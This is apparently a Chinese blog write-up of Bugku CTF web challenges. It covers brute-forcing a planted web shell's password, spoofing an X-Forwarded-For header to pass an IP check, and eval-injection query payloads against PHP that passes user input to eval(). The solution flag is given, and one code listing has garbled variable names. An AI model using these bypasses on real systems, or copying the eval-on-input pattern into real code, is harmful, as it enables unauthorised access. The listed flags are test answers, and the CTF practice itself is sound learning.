bugku ctf

简介: bugku ctf练习平台

bugku ctf

game1

描  述: game1

网站被黑

WEB

描  述: 网站被黑了 黑客会不会留下后门

第一步扫目录 shell.php路径

第二部 pass密码1111抓包爆破

得到hacker

flag{94ec3a0b6b2ecb817a0fb5018f1b211e}

本地管理员

WEB

描  述: 本地管理员

直接admin test123会提示IP禁止访问,请联系本地管理员登陆,IP已�

请求包添加

X-Forwarded-For:127.0.0.1

eval

描  述: eval

<?php
    include "flag.php";
    $a = @$_REQUEST['hello'];
    eval( "var_dump($a);");
    show_source(__FILE__);
?>
http://x.x.x.x:13063/?hello=file("flag.php")

变量1

WEB

描  述: 题目变量1

$a=b
$b=c
echo $$a
这时候会输出c
GLOBALS:一个包含了全部变量的全局组合数组。变量的名字就是数组的键。
flag In the variable!
<? php 
error_reporting(0); //关闭php错误显示
include "flagl. php"; //引入flag1.php文件代码
highlight_file(file); 
if(isset($_GET[' args'])){//通过get方式传递 args变量才能执行if里面的代码
    $args =$_GET[' args']; 
    if(! preg_match("/\w+$/", Sargs)){//用正则表达式判断$args值,是否为任意大小写字母和0到9以及下划线组成,不是就打印"args error!";是执行var_dump($$args)。
      die("args error!"); 
    }
    eval("var_dump(SSargs);");
}
?>

?args=GLOBALS

头等舱

WEB

描  述: 头等舱

打开网页什么也没有

使用burp

相关文章
|
4天前
BUUCTF easyre 1
BUUCTF easyre 1
27 0
|
4天前
|
安全 Java PHP
CTF中的一些做题姿势
该文主要讨论了版本控制漏洞,提到了 `.git`, `.svn`, `.hg`, `CVS` 和 `.bzr` 等版本控制系统可能导致的源代码泄露。另外,文章指出压缩文件如 `.rar`, `.zip` 等如果备份在Web目录下,可能被攻击者下载。`.DS_Store` 文件和 `.filename.swp` (vim的临时文件)也可能泄漏敏感信息。域名的`txt`记录、`tz.php`探针和`phpinfo()`函数的滥用可暴露服务器详情。文中还探讨了多种绕过过滤的策略,并举例说明了如何利用`PHP`构造payload来执行命令或读取文件,强调了POST请求可能规避某些过滤限制。
19 0
|
4天前
|
数据格式 Python
BUUCTF 梅花香之苦寒来 1
BUUCTF 梅花香之苦寒来 1
51 1
|
4天前
BUUCTF 你竟然赶我走 1
BUUCTF 你竟然赶我走 1
18 0
|
4天前
|
网络协议
BUUCTF easycap 1
BUUCTF easycap 1
28 0
|
4天前
BUUCTF 另外一个世界 1
BUUCTF 另外一个世界 1
33 0
|
8月前
|
Unix
BUUCTF Unencode 1
BUUCTF Unencode 1
37 1
|
8月前
|
数据安全/隐私保护
BUUCTF 摩丝 1
BUUCTF 摩丝 1
29 0
|
11月前
|
SQL 安全 Shell
CTF——常见题型
CTF——常见题型
159 0
|
12月前
|
Shell Perl
CTF真题 | [HITCON 2017]SSRFme
CTF真题 | [HITCON 2017]SSRFme
156 0